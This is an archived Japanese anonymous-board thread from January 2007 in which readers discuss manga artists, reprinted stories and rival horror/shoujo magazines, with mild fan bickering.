この流れでそんなこと言うと、
白井のがゴミ漫画でお前は白井のゴミ読者という解釈をされちゃうゾ☆

白井には頑張って欲しいよ。羽衣好きだったんだ。

382 :花と名無しさん:2007/01/13(土) 22:22:47 ID:???0
絵は綺麗だし、良い話も書けてるんだから期待したい

383 :花と名無しさん:2007/01/13(土) 22:55:08 ID:???0
かずはしオズ、いいね〜。
クリスマスキャロルみたいなほのぼの話期待してる。

384 :花と名無しさん:2007/01/14(日) 10:49:12 ID:???O
白井は絵の上手さと印象的な場面で引っ張るタイプだと思うから(キャラが弱い)
主役を今回みたいな痛いのにしたり、語り部を配置すると途端にアラが出てくると思う。

シリーズモノいらないに同意。
マキコ読み切りの方がいい。

385 :花と名無しさん:2007/01/15(月) 19:23:54 ID:???O
まきこ、波瀾の連載は面白いのにね。ダークネスいいよ〜

386 :花と名無しさん:2007/01/15(月) 22:18:46 ID:???0
てか、ダークネスは再録。
コミックスが10年前に秋田書店から出てる。

387 :花と名無しさん:2007/01/16(火) 23:34:45 ID:???0
今度、甘グリで千之がジャンヌ・ダルク描くらしいな。
ファウストといい、白井のネタとかぶりまくりだよ。
しかもあっちの方が断然面白かったりするんだよな。

388 :花と名無しさん:2007/01/16(火) 23:53:54 ID:???0
千之引き抜いてくれないかな…(´・ω・`)


389 :花と名無しさん:2007/01/17(水) 13:09:44 ID:???O
増刊もここでよい?
元ネタO嬢の物語ってのが載ってたが、どうも生活板に個人スレ立ってる某センセにしか見えない。

390 :花と名無しさん:2007/01/17(水) 15:18:10 ID:???O
>>387
まじで〜。
千之が救国の少女をどう描くか、今からwktk


391 :花と名無しさん:2007/01/18(木) 16:21:53 ID:???O
波瀾で久々にかずはしの伊達政宗読んだけど、和物ならドロドロ
愛憎劇もありだなと思った。淡白な絵がストイックさをうまく
表現してる。

392 :花と名無しさん:2007/01/18(木) 17:33:13 ID:???0
あー、そういや、私もかずはしは和物の方が好きだ。
ストイックな男の子が和物に似合ってるのかも。

393 :花と名無しさん:2007/01/19(金) 00:35:40 ID:???0
かずはしは残グリ時代しか知らなかったんだけど
ホラーM文庫の読んだら泣けた。
ホラー?っていうかSF?っぽいやつばっかだったけど。
ああいうの残グリでは描かないのかな。

394 :花と名無しさん:2007/01/19(金) 11:02:26 ID:MSiDd3zq0
今回の波乱はダークネス以外、ここ最近1,2年以内に読んだものの再録ばっかだったなー
ダークネスも再録だしさ。

395 :花と名無しさん:2007/01/21(日) 12:10:35 ID:???O
>>388
千之は昔残グリに描いてたよ
なんでいなくなっちゃったんだろ?人気なかったわけではないだろうに
編集部と喧嘩でもしたのかな?
でも甘栗から千之いなくなったら
あの雑誌潰れるな…

396 :花と名無しさん:2007/01/21(日) 22:39:30 ID:???0
うん、確実に潰れるね。
他はレベルがあまりにも違い過ぎる。

397 :花と名無しさん:2007/01/22(月) 21:53:16 ID:???0
千之ファンってことごとく他の作家を貶めるな
千之ファンにしては下品だからやめたほうがいいよ

398 :花と名無しさん:2007/01/22(月) 22:54:13 ID:???0
甘栗については、395、396の言うとおりじゃないだろか…
正直、千野のほかにも好きな作家はいるけど。読むとこ少なすぎ。
もっとも、最近の残グリも徐々にそういうテイストになってきてるけど。

399 :395:2007/01/23(火) 12:31:25 ID:???O
自分も甘栗には千之以外に好きな作家いるけど
雑誌自体が地味なんで危機を感じてるわけですよ
決して他の作家が嫌いとかそんなんじゃなくて、心配だなと思って。
地味ながらもここでしか読めない作家の漫画もあるので、休刊にならないために
千之引き抜きは個人的に嫌だなぁと…
これ以上レスするとスレ違いと非難されちゃうんで、ここまでにしときます

400 :花と名無しさん:2007/01/24(水) 17:39:29 ID:???0
呪の漫画のジャスティン父子が、某超人父子に見える…。

96 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)